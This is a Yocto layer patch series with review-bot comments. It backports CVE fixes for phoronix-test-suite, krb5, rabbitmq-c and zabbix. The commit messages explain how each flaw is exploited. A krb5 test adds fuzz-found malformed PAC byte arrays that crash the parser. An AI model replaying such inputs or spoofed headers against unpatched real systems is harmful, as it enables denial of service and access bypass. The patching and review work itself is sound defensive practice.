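Review bot: The `tar ... -czf ${S}/python-pkg/dist/${BP}.tar.gz ${S}` line in `do_install:prepend` builds the archive with default metadata, so file order, mtimes and the build user's uid/gid end up in a tarball that, per the comment above the function, is then consumed by the install step. That likely makes the packaged output differ between build hosts. Consider `tar --sort=name --mtime="@${SOURCE_DATE_EPOCH}" --owner=0 --group=0 --numeric-owner ...`. Whether SOURCE_DATE_EPOCH is exported in this task should be confirmed.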
@@ -117,7 +117,7 @@ scons_do_install() { # install mongo data folder install -m 755 -d ${D}${localstatedir}/lib/${BPN} - chown ${PN}:${PN} ${D}${localstatedir}/lib/${BPN} + chown ${BPN}:${BPN} ${D}${localstatedir}/lib/${BPN} # Create /var/log/mongodb in runtime. if [ "${@bb.utils.filter('DISTRO_FEATURES', 'systemd', d)}" ]; then diff --git a/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb b/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb index 188d4e5bdf..68c42b329a 100644 --- a/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb +++ b/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb @@ -24,7 +24,7 @@ SRCREV = "0858b450cd88c84a15b99dda9698d44e7f7e8c70" S = "${WORKDIR}/git" -inherit waf pkgconfig features_check +inherit waf pkgconfig features_check python3native ANY_OF_DISTRO_FEATURES = "opengl dispmanx" diff --git a/meta-oe/recipes-benchmark/iperf3/iperf3_3.11.bb b/meta-oe/recipes-benchmark/iperf3/iperf3_3.14.bb index 2142a8ef1d..d181eb3b02 100644 --- a/meta-oe/recipes-benchmark/iperf3/iperf3_3.11.bb +++ b/meta-oe/recipes-benchmark/iperf3/iperf3_3.14.bb @@ -11,14 +11,14 @@ BUGTRACKER = "https://github.com/esnet/iperf/issues" AUTHOR = "ESNET <info@es.net>, Lawrence Berkeley National Laboratory <websupport@lbl.gov>" LICENSE = "BSD-3-Clause" -LIC_FILES_CHKSUM = "file://LICENSE;md5=68ae8cfc577a2c8c51bb51e9628e80b7" +LIC_FILES_CHKSUM = "file://LICENSE;md5=dc6301c8256ceb8f71c9e3c2ae9096b9" SRC_URI = "git://github.com/esnet/iperf.git;branch=master;protocol=https \ file://0002-Remove-pg-from-profile_CFLAGS.patch \ file://0001-configure.ac-check-for-CPP-prog.patch \ " -SRCREV = "76bd67f6e90e239a7686202d2b1b595159826d24" +SRCREV = "a0be85934144bc04712a6695b14ea6e45c379e1d" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-benchmark/phoronix-test-suite/files/CVE-2022-40704.patch b/meta-oe/recipes-benchmark/phoronix-test-suite/files/CVE-2022-40704.patch new file mode 100644 index 0000000000..8b6405b4ad --- /dev/null 
+++ b/meta-oe/recipes-benchmark/phoronix-test-suite/files/CVE-2022-40704.patch @@ -0,0 +1,46 @@ +From d3880d9d3ba795138444da83f1153c3c3ac27640 Mon Sep 17 00:00:00 2001 +From: Michael Larabel <michael@phoronix.com> +Date: Sat, 23 Jul 2022 07:32:43 -0500 +Subject: [PATCH] phoromatic: Explicitly check both $_GET abd $_POST in + phoromatic_quit_if_invalid_input_found() + +Fixes: https://github.com/phoronix-test-suite/phoronix-test-suite/issues/650#issuecomment-1193116678 + +Upstream-Status: Backport +CVE: CVE-2022-40704 + +Reference to upstream patch: +https://github.com/phoronix-test-suite/phoronix-test-suite/commit/d3880d9d3ba795138444da83f1153c3c3ac27640 + +Signed-off-by: Li Wang <li.wang@windriver.com> +--- + pts-core/phoromatic/phoromatic_functions.php | 15 +++++++++++++-- + 1 file changed, 13 insertions(+), 2 deletions(-) + +diff --git a/pts-core/phoromatic/phoromatic_functions.php b/pts-core/phoromatic/phoromatic_functions.php +index 74ccc5444c..c2313dcdea 100644 +--- a/pts-core/phoromatic/phoromatic_functions.php ++++ b/pts-core/phoromatic/phoromatic_functions.php +@@ -37,9 +37,20 @@ function phoromatic_quit_if_invalid_input_found($input_keys = null) + { + foreach($input_keys as $key) + { +- if(isset($_REQUEST[$key]) && !empty($_REQUEST[$key])) ++ if(isset($_GET[$key]) && !empty($_GET[$key])) + { +- foreach(pts_arrays::to_array($_REQUEST[$key]) as $val_to_check) ++ foreach(pts_arrays::to_array($_GET[$key]) as $val_to_check) ++ { ++ if(stripos($val_to_check, $invalid_string) !== false) ++ { ++ echo '<strong>Exited due to invalid input ( ' . $invalid_string . ') attempted:</strong> ' . htmlspecialchars($val_to_check); ++ exit; ++ } ++ } ++ } ++ if(isset($_POST[$key]) && !empty($_POST[$key])) ++ { ++ foreach(pts_arrays::to_array($_POST[$key]) as $val_to_check) + { + if(stripos($val_to_check, $invalid_string) !== false) + { 
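Review bot: The `$_GET` and `$_POST` blocks added to `phoromatic_quit_if_invalid_input_found()` are line-for-line copies, so a later change to the check can easily land in one and not the other. A single outer loop, `foreach(array($_GET, $_POST) as $input_source)`, with the existing `isset`/`stripos` body reading `$input_source[$key]`, would keep them in step. The check is also a substring denylist on `$invalid_string`, so it is a backstop only. The pages that print these parameters are outside this hunk and still need their own output encoding. The function starts above the hunk and the patch ends inside the second loop, so the remainder is not visible.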
diff --git a/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb b/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb index 825f7024e7..44f2249bc9 100644 --- a/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb +++ b/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb @@ -5,7 +5,11 @@ LICENSE = "GPL-3.0-only" LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" SECTION = "console/tests" -SRC_URI = "http://www.phoronix-test-suite.com/releases/${BP}.tar.gz" +SRC_URI = "http://www.phoronix-test-suite.com/releases/${BP}.tar.gz \ + file://CVE-2022-40704.patch \ + " + + SRC_URI[md5sum] = "459c3c45b39bb3d720ddc8ba5f944332" SRC_URI[sha256sum] = "86681343d20415831ab16ef6c3d1c317e2345e771925e0698ae920a03a9eaab6" diff --git a/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb b/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb index f821cdaf4a..aba5ab5878 100644 --- a/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb +++ b/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb @@ -151,12 +151,13 @@ RRECOMMENDS:${PN}-fancontrol = "lmsensors-config-fancontrol" # sensors-detect script files FILES:${PN}-sensorsdetect = "${sbindir}/sensors-detect" FILES:${PN}-sensorsdetect-doc = "${mandir}/man8/sensors-detect.8" -RDEPENDS:${PN}-sensorsdetect = "${PN}-sensors perl perl-modules" +RDEPENDS:${PN}-sensorsdetect = "${PN}-sensors perl perl-module-fcntl perl-module-file-basename \ + perl-module-strict perl-module-constant" # sensors-conf-convert script files FILES:${PN}-sensorsconfconvert = "${bindir}/sensors-conf-convert" FILES:${PN}-sensorsconfconvert-doc = "${mandir}/man8/sensors-conf-convert.8" -RDEPENDS:${PN}-sensorsconfconvert = "${PN}-sensors perl perl-modules" +RDEPENDS:${PN}-sensorsconfconvert = "${PN}-sensors perl perl-module-strict perl-module-vars" # pwmconfig script files FILES:${PN}-pwmconfig = "${sbindir}/pwmconfig" 
diff --git a/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb b/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb index d3e7973329..9b72ffefe4 100644 --- a/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb +++ b/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb @@ -20,3 +20,5 @@ do_install() { ALLOW_EMPTY:${PN} = "1" PACKAGE_ARCH = "${MACHINE_ARCH}" INHIBIT_DEFAULT_DEPS = "1" + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-connectivity/krb5/krb5/CVE-2022-42898.patch b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2022-42898.patch new file mode 100644 index 0000000000..6d04bf8980 --- /dev/null +++ b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2022-42898.patch 
@@ -0,0 +1,110 @@ +From 4e661f0085ec5f969c76c0896a34322c6c432de4 Mon Sep 17 00:00:00 2001 +From: Greg Hudson <ghudson@mit.edu> +Date: Mon, 17 Oct 2022 20:25:11 -0400 +Subject: [PATCH] Fix integer overflows in PAC parsing + +In krb5_parse_pac(), check for buffer counts large enough to threaten +integer overflow in the header length and memory length calculations. +Avoid potential integer overflows when checking the length of each +buffer. Credit to OSS-Fuzz for discovering one of the issues. + +CVE-2022-42898: + +In MIT krb5 releases 1.8 and later, an authenticated attacker may be +able to cause a KDC or kadmind process to crash by reading beyond the +bounds of allocated memory, creating a denial of service. A +privileged attacker may similarly be able to cause a Kerberos or GSS +application service to crash. On 32-bit platforms, an attacker can +also cause insufficient memory to be allocated for the result, +potentially leading to remote code execution in a KDC, kadmind, or GSS +or Kerberos application server process. An attacker with the +privileges of a cross-realm KDC may be able to extract secrets from a +KDC process's memory by having them copied into the PAC of a new +ticket. 
+ +(cherry picked from commit ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583) + +ticket: 9074 +version_fixed: 1.19.4 + +Upstream-Status: Backport [https://github.com/krb5/krb5/commit/4e661f0085ec5f969c76c0896a34322c6c432de4] +CVE: CVE-2022-42898 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + src/lib/krb5/krb/pac.c | 9 +++++++-- + src/lib/krb5/krb/t_pac.c | 18 ++++++++++++++++++ + 2 files changed, 25 insertions(+), 2 deletions(-) + +diff --git a/src/lib/krb5/krb/pac.c b/src/lib/krb5/krb/pac.c +index cc74f37..70428a1 100644 +--- a/src/lib/krb5/krb/pac.c ++++ b/src/lib/krb5/krb/pac.c +@@ -27,6 +27,8 @@ + #include "k5-int.h" + #include "authdata.h" + ++#define MAX_BUFFERS 4096 ++ + /* draft-brezak-win2k-krb-authz-00 */ + + /* +@@ -316,6 +318,9 @@ krb5_pac_parse(krb5_context context, + if (version != 0) + return EINVAL; + ++ if (cbuffers < 1 || cbuffers > MAX_BUFFERS) ++ return ERANGE; ++ + header_len = PACTYPE_LENGTH + (cbuffers * PAC_INFO_BUFFER_LENGTH); + if (len < header_len) + return ERANGE; +@@ -348,8 +353,8 @@ krb5_pac_parse(krb5_context context, + krb5_pac_free(context, pac); + return EINVAL; + } +- if (buffer->Offset < header_len || +- buffer->Offset + buffer->cbBufferSize > len) { ++ if (buffer->Offset < header_len || buffer->Offset > len || ++ buffer->cbBufferSize > len - buffer->Offset) { + krb5_pac_free(context, pac); + return ERANGE; + } +diff --git a/src/lib/krb5/krb/t_pac.c b/src/lib/krb5/krb/t_pac.c +index 7b756a2..2353e9f 100644 +--- a/src/lib/krb5/krb/t_pac.c ++++ b/src/lib/krb5/krb/t_pac.c +@@ -431,6 +431,16 @@ static const unsigned char s4u_pac_ent_xrealm[] = { + 0x8a, 0x81, 0x9c, 0x9c, 0x00, 0x00, 0x00, 0x00 + }; + ++static const unsigned char fuzz1[] = { ++ 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, ++ 0x06, 0xff, 0xff, 0xff, 0x00, 0x00, 0xf5 ++}; ++ ++static const unsigned char fuzz2[] = { ++ 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, ++ 0x20, 0x20 ++}; ++ + static const char *s4u_principal = "w2k8u@ACME.COM"; + static 
const char *s4u_enterprise = "w2k8u@abc@ACME.COM"; + +@@ -646,6 +656,14 @@ main(int argc, char **argv) + krb5_free_principal(context, sep); + } + ++ /* Check problematic PACs found by fuzzing. */ ++ ret = krb5_pac_parse(context, fuzz1, sizeof(fuzz1), &pac); ++ if (!ret) ++ err(context, ret, "krb5_pac_parse should have failed"); ++ ret = krb5_pac_parse(context, fuzz2, sizeof(fuzz2), &pac); ++ if (!ret) ++ err(context, ret, "krb5_pac_parse should have failed"); ++ + /* + * Test empty free + */ +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/krb5/krb5/CVE-2023-36054.patch b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2023-36054.patch new file mode 100644 index 0000000000..160c090bce --- /dev/null +++ b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2023-36054.patch 
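Review bot: `MAX_BUFFERS` is added to pac.c with no comment on what the bound protects, so the new `cbuffers < 1 || cbuffers > MAX_BUFFERS` check in krb5_pac_parse() reads as an arbitrary limit. Going by the commit message, it presumably exists to keep `PACTYPE_LENGTH + (cbuffers * PAC_INFO_BUFFER_LENGTH)` and the later allocation size from overflowing. A one-line comment above the define would record that, for example `/* Cap on cbuffers so the header and allocation length arithmetic cannot overflow. */`. Because this is a backport, the comment is better proposed upstream than added locally, so the patch stays identical to the referenced commit. krb5_pac_parse() starts and ends outside the inner hunks.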
@@ -0,0 +1,68 @@ +From ef08b09c9459551aabbe7924fb176f1583053cdd Mon Sep 17 00:00:00 2001 +From: Greg Hudson <ghudson@mit.edu> +Date: Mon, 21 Aug 2023 03:08:15 +0000 +Subject: [PATCH] Ensure array count consistency in kadm5 RPC + +In _xdr_kadm5_principal_ent_rec(), ensure that n_key_data matches the +key_data array count when decoding. Otherwise when the structure is +later freed, xdr_array() could iterate over the wrong number of +elements, either leaking some memory or freeing uninitialized +pointers. Reported by Robert Morris. + +CVE: CVE-2023-36054 + +An authenticated attacker can cause a kadmind process to crash by +freeing uninitialized pointers. Remote code execution is unlikely. +An attacker with control of a kadmin server can cause a kadmin client +to crash by freeing uninitialized pointers. + +ticket: 9099 (new) +tags: pullup +target_version: 1.21-next +target_version: 1.20-next + +Upstream-Status: Backport [https://github.com/krb5/krb5/commit/ef08b09c9459551aabbe7924fb176f1583053cdd] + +Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com> +--- + src/lib/kadm5/kadm_rpc_xdr.c | 11 ++++++++--- + 1 file changed, 8 insertions(+), 3 deletions(-) + +diff --git a/src/lib/kadm5/kadm_rpc_xdr.c b/src/lib/kadm5/kadm_rpc_xdr.c +index 2892d41..94b1ce8 100644 +--- a/src/lib/kadm5/kadm_rpc_xdr.c ++++ b/src/lib/kadm5/kadm_rpc_xdr.c +@@ -390,6 +390,7 @@ _xdr_kadm5_principal_ent_rec(XDR *xdrs, kadm5_principal_ent_rec *objp, + int v) + { + unsigned int n; ++ bool_t r; + + if (!xdr_krb5_principal(xdrs, &objp->principal)) { + return (FALSE); +@@ -443,6 +444,9 @@ _xdr_kadm5_principal_ent_rec(XDR *xdrs, kadm5_principal_ent_rec *objp, + if (!xdr_krb5_int16(xdrs, &objp->n_key_data)) { + return (FALSE); + } ++ if (xdrs->x_op == XDR_DECODE && objp->n_key_data < 0) { ++ return (FALSE); ++ } + if (!xdr_krb5_int16(xdrs, &objp->n_tl_data)) { + return (FALSE); + } +@@ -451,9 +455,10 @@ _xdr_kadm5_principal_ent_rec(XDR *xdrs, kadm5_principal_ent_rec *objp, + return FALSE; + } + n = 
objp->n_key_data; +- if (!xdr_array(xdrs, (caddr_t *) &objp->key_data, +- &n, ~0, sizeof(krb5_key_data), +- xdr_krb5_key_data_nocontents)) { ++ r = xdr_array(xdrs, (caddr_t *) &objp->key_data, &n, objp->n_key_data, ++ sizeof(krb5_key_data), xdr_krb5_key_data_nocontents); ++ objp->n_key_data = n; ++ if (!r) { + return (FALSE); + } + +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb b/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb index 6e0b2fdacb..a92066171b 100644 --- a/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb +++ b/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb @@ -32,6 +32,8 @@ SRC_URI = "http://web.mit.edu/kerberos/dist/${BPN}/${SHRT_VER}/${BP}.tar.gz \ file://krb5-admin-server.service \ file://CVE-2021-36222.patch;striplevel=2 \ file://CVE-2021-37750.patch;striplevel=2 \ + file://CVE-2022-42898.patch;striplevel=2 \ + file://CVE-2023-36054.patch;striplevel=2 \ " SRC_URI[md5sum] = "aa4337fffa3b61f22dbd0167f708818f" SRC_URI[sha256sum] = "1a4bba94df92f6d39a197a10687653e8bfbc9a2076e129f6eb92766974f86134" diff --git a/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb b/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb index 2a3a4ebd06..24b9e9a071 100644 --- a/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb +++ b/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb @@ -4,6 +4,7 @@ LICENSE = "MIT & Zlib & BSD-3-Clause & Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=c8bea43a2eb5d713c338819a0be07797" DEPENDS = "zlib" +DEPENDS:append:class-native = " libcap-native" S = "${WORKDIR}/git" SRCREV = "8d605f0649ed1ab6d27a443c7688598ea21fdb75" @@ -44,3 +45,5 @@ RDEPENDS:${PN}-dev += " ${@bb.utils.contains('PACKAGECONFIG', 'static', '${PN}-s # Avoid absolute paths to end up in the sysroot. SSTATE_SCAN_FILES += "*.cmake" + +BBCLASSEXTEND = "native" 
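Review bot: The write-back `objp->n_key_data = n;` in _xdr_kadm5_principal_ent_rec() runs before the xdr_array() result is tested, and nothing in the code says why. A later cleanup could move it below `if (!r)` and bring back the count mismatch. The commit message gives the reason: a later free must iterate over the number of elements actually decoded. I would put that on the line itself, for example `/* Keep the count in step with the array even on failure, so a later free walks only decoded elements. */`. The negative-count guard applies only to `XDR_DECODE`; whether encode callers can pass a negative n_key_data is not visible here, and the function body starts and ends outside the hunk.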
diff --git a/meta-oe/recipes-connectivity/linuxptp/linuxptp/0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch b/meta-oe/recipes-connectivity/linuxptp/linuxptp/0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch new file mode 100644 index 0000000000..83bdae858f --- /dev/null +++ b/meta-oe/recipes-connectivity/linuxptp/linuxptp/0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch @@ -0,0 +1,42 @@ +From dfd38cb29c0768692f886d3ab9158bd2b3132582 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Tue, 22 Nov 2022 15:20:48 +0800 +Subject: [PATCH] makefile: use conditional assignment for KBUILD_OUTPUT + +Refer [1],from make 4.4, all variables that are marked as export will +also be passed to the shell started by the shell function. use "=" will +make KBUILD_OUTPUT always empty for shell function, use "?=" to make +"export KBUILD_OUTPUT" in enrironment can work. + +[snip of 4.4 NEWS] +* WARNING: Backward-incompatibility! + Previously makefile variables marked as export were not exported to commands + started by the $(shell ...) function. Now, all exported variables are + exported to $(shell ...). +[snip] + +[1] https://git.savannah.gnu.org/cgit/make.git/tree/NEWS?h=4.4&id=ed493f6c9116cc217b99c2cfa6a95f15803235a2#n74 + +Upstream-Status: Backport [d3dd51ba611802d7cbb28631cb943cb882fa4aac] + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + makefile | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/makefile b/makefile +index 529d8a0..3db60fa 100644 +--- a/makefile ++++ b/makefile +@@ -15,7 +15,7 @@ + # with this program; if not, write to the Free Software Foundation, Inc., + # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +-KBUILD_OUTPUT = ++KBUILD_OUTPUT ?= + + DEBUG = + CC ?= $(CROSS_COMPILE)gcc +-- +2.25.1 + 
diff --git a/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb b/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb index 9c0f56e736..9c8e649b1a 100644 --- a/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb +++ b/meta-oe/recipes-connectivity/linuxptp/linuxptp_3.1.1.bb @@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRC_URI = "http://sourceforge.net/projects/linuxptp/files/v3.1/linuxptp-${PV}.tgz \ file://build-Allow-CC-and-prefix-to-be-overriden.patch \ file://Use-cross-cpp-in-incdefs.patch \ + file://0001-makefile-use-conditional-assignment-for-KBUILD_OUTPU.patch \ " UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/linuxptp/files/" diff --git a/meta-oe/recipes-connectivity/rabbitmq-c/files/CVE-2023-35789.patch b/meta-oe/recipes-connectivity/rabbitmq-c/files/CVE-2023-35789.patch new file mode 100644 index 0000000000..93949fc21d --- /dev/null +++ b/meta-oe/recipes-connectivity/rabbitmq-c/files/CVE-2023-35789.patch 
@@ -0,0 +1,135 @@ +From 463054383fbeef889b409a7f843df5365288e2a0 Mon Sep 17 00:00:00 2001 +From: Christian Kastner <ckk@kvr.at> +Date: Tue, 13 Jun 2023 14:21:52 +0200 +Subject: [PATCH] Add option to read username/password from file (#781) + +* Add option to read username/password from file + +CVE: CVE-2023-35789 + +Upstream-Status: Backport [https://github.com/alanxz/rabbitmq-c/commit/463054383fbeef889b409a7f843df5365288e2a0] + +Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com> +--- + tools/common.c | 66 ++++++++++++++++++++++++++++++++++++++++++++++++++ + 1 file changed, 66 insertions(+) + +diff --git a/tools/common.c b/tools/common.c +index 53ea788..35b2b9f 100644 +--- a/tools/common.c ++++ b/tools/common.c +@@ -54,6 +54,11 @@ + #include "compat.h" + #endif + ++/* For when reading auth data from a file */ ++#define MAXAUTHTOKENLEN 128 ++#define USERNAMEPREFIX "username:" ++#define PASSWORDPREFIX "password:" ++ + void die(const char *fmt, ...) { + va_list ap; + va_start(ap, fmt); +@@ -161,6 +166,7 @@ static char *amqp_vhost; + static char *amqp_username; + static char *amqp_password; + static int amqp_heartbeat = 0; ++static char *amqp_authfile; + #ifdef WITH_SSL + static int amqp_ssl = 0; + static char *amqp_cacert = "/etc/ssl/certs/cacert.pem"; +@@ -183,6 +189,8 @@ struct poptOption connect_options[] = { + "the password to login with", "password"}, + {"heartbeat", 0, POPT_ARG_INT, &amqp_heartbeat, 0, + "heartbeat interval, set to 0 to disable", "heartbeat"}, ++ {"authfile", 0, POPT_ARG_STRING, &amqp_authfile, 0, ++ "path to file containing username/password for authentication", "file"}, + #ifdef WITH_SSL + {"ssl", 0, POPT_ARG_NONE, &amqp_ssl, 0, "connect over SSL/TLS", NULL}, + {"cacert", 0, POPT_ARG_STRING, &amqp_cacert, 0, +@@ -194,6 +202,50 @@ struct poptOption connect_options[] = { + #endif /* WITH_SSL */ + {NULL, '\0', 0, NULL, 0, NULL, NULL}}; + ++void read_authfile(const char *path) { ++ size_t n; ++ FILE *fp = NULL; ++ char token[MAXAUTHTOKENLEN]; 
++ ++ if ((amqp_username = malloc(MAXAUTHTOKENLEN)) == NULL || ++ (amqp_password = malloc(MAXAUTHTOKENLEN)) == NULL) { ++ die("Out of memory"); ++ } else if ((fp = fopen(path, "r")) == NULL) { ++ die("Could not read auth data file %s", path); ++ } ++ ++ if (fgets(token, MAXAUTHTOKENLEN, fp) == NULL || ++ strncmp(token, USERNAMEPREFIX, strlen(USERNAMEPREFIX))) { ++ die("Malformed auth file (missing username)"); ++ } ++ strncpy(amqp_username, &token[strlen(USERNAMEPREFIX)], MAXAUTHTOKENLEN); ++ /* Missing newline means token was cut off */ ++ n = strlen(amqp_username); ++ if (amqp_username[n - 1] != '\n') { ++ die("Username too long"); ++ } else { ++ amqp_username[n - 1] = '\0'; ++ } ++ ++ if (fgets(token, MAXAUTHTOKENLEN, fp) == NULL || ++ strncmp(token, PASSWORDPREFIX, strlen(PASSWORDPREFIX))) { ++ die("Malformed auth file (missing password)"); ++ } ++ strncpy(amqp_password, &token[strlen(PASSWORDPREFIX)], MAXAUTHTOKENLEN); ++ /* Missing newline means token was cut off */ ++ n = strlen(amqp_password); ++ if (amqp_password[n - 1] != '\n') { ++ die("Password too long"); ++ } else { ++ amqp_password[n - 1] = '\0'; ++ } ++ ++ (void)fgetc(fp); ++ if (!feof(fp)) { ++ die("Malformed auth file (trailing data)"); ++ } ++} ++ + static void init_connection_info(struct amqp_connection_info *ci) { + ci->user = NULL; + ci->password = NULL; +@@ -269,6 +321,8 @@ static void init_connection_info(struct amqp_connection_info *ci) { + if (amqp_username) { + if (amqp_url) { + die("--username and --url options cannot be used at the same time"); ++ } else if (amqp_authfile) { ++ die("--username and --authfile options cannot be used at the same time"); + } + + ci->user = amqp_username; +@@ -277,11 +331,23 @@ static void init_connection_info(struct amqp_connection_info *ci) { + if (amqp_password) { + if (amqp_url) { + die("--password and --url options cannot be used at the same time"); ++ } else if (amqp_authfile) { ++ die("--password and --authfile options cannot be used at the same 
time"); + } + + ci->password = amqp_password; + } + ++ if (amqp_authfile) { ++ if (amqp_url) { ++ die("--authfile and --url options cannot be used at the same time"); ++ } ++ ++ read_authfile(amqp_authfile); ++ ci->user = amqp_username; ++ ci->password = amqp_password; ++ } ++ + if (amqp_vhost) { + if (amqp_url) { + die("--vhost and --url options cannot be used at the same time"); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb b/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb index 304171c88c..1cc4ada3b5 100644 --- a/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb +++ b/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.11.0.bb @@ -3,7 +3,9 @@ HOMEPAGE = "https://github.com/alanxz/rabbitmq-c" LIC_FILES_CHKSUM = "file://LICENSE-MIT;md5=6b7424f9db80cfb11fdd5c980b583f53" LICENSE = "MIT" -SRC_URI = "git://github.com/alanxz/rabbitmq-c.git;branch=master;protocol=https" +SRC_URI = "git://github.com/alanxz/rabbitmq-c.git;branch=master;protocol=https \ + file://CVE-2023-35789.patch \ + " # v0.11.0-master SRCREV = "a64c08c68aff34d49a2ac152f04988cd921084f9" diff --git a/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb b/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb index 79d54038eb..a33265063c 100644 --- a/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb +++ b/meta-oe/recipes-connectivity/ser2net/ser2net_4.3.5.bb @@ -14,5 +14,3 @@ SRC_URI[sha256sum] = "848c4fe863806e506832f1ee85b8b68258f06eb19dad43dbeee16a2cfe UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/ser2net/files/ser2net" inherit autotools pkgconfig - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-43515.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-43515.patch new file mode 100644 index 0000000000..6028520923 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-43515.patch 
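Review bot: In read_authfile(), `amqp_username[n - 1]` and `amqp_password[n - 1]` are read without checking that `n` is non-zero. When a line holds only the prefix and no newline, `n` is 0, `n - 1` wraps, and the index falls outside the allocation. Guard both tests, e.g. `if (n == 0 || amqp_username[n - 1] != '\n')`, and the same for the password. The function also returns without `fclose(fp);` and leaves the password line in the stack buffer `token`. Closing the file and clearing `token` before returning would suit a credential-handling path.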
@@ -0,0 +1,37 @@ +From 6b5dfdb31aa503bb0358784c632ff3a04e7a8ff4 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Wed, 4 Jan 2023 13:51:03 +0800 +Subject: [PATCH] [DEV-2301] fixed spoofing X-Forwarded-For request header + allows to access Frontend in maintenace mode + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/50668e9d64af32cdc67a45082c556699ff86565e] +CVE: CVE-2022-43515 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + ui/include/classes/user/CWebUser.php | 6 ++---- + 1 file changed, 2 insertions(+), 4 deletions(-) + +diff --git a/ui/include/classes/user/CWebUser.php b/ui/include/classes/user/CWebUser.php +index e6e651e..bfacce7 100644 +--- a/ui/include/classes/user/CWebUser.php ++++ b/ui/include/classes/user/CWebUser.php +@@ -231,13 +231,11 @@ class CWebUser { + } + + /** +- * Get user ip address. ++ * Get user IP address. + * + * @return string + */ + public static function getIp(): string { +- return (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== '') +- ? $_SERVER['HTTP_X_FORWARDED_FOR'] +- : $_SERVER['REMOTE_ADDR']; ++ return $_SERVER['REMOTE_ADDR']; + } + } +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-46768.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-46768.patch new file mode 100644 index 0000000000..debd0aaa8e --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2022-46768.patch 
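Review bot: The getIp() docblock still says only "Get user IP address" and does not record that forwarded headers are now ignored on purpose. A line such as `* Returns the TCP peer address only; X-Forwarded-For is client-controlled and is deliberately not consulted.` would keep a later change from restoring the header lookup. Behind a reverse proxy this presumably returns the proxy's address for every client. That is worth stating in the same docblock, since any address-based check built on getIp() would then see the proxy rather than the end user.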
